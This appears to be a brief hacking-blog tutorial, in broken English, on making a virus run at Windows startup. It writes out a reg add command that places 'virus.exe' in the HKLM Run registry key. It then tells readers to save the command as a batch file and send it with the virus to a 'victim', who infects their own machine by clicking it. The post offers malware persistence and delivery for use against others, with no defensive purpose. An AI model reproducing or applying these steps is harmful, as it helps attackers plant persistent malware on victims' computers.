How to Execute Virus On Startup





Hi guys today i going to tell how to execute virus on startup. So our requirement is to run our virus again even if the system get rebooted. So for that we will have to send our virus on start up. Here we would like to send it with the help of batch file .
So lets Start the execution of process...



  1. Open a Notepad file.
  2. Write down the below command in notepad.
  3. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v demo /t REG_SZ /d virus.exe (virus.exe is a virus).
  4. Now save the notepad file with any name say Cpuworms but extension should be (.BAT) Which means we will have to create a batch file eg: Cpuworms.bat.
  5. Now send Cpuworms.bat along with virus.exe virus to your victim. Whenever he will click on Cpuworms.bat file automatically virus.exe will reach at the start up.
  6. Now the impact of the virus will also be visible after the restart of the system.


For more stuff keep visiting....
-->

Comments

Popular Posts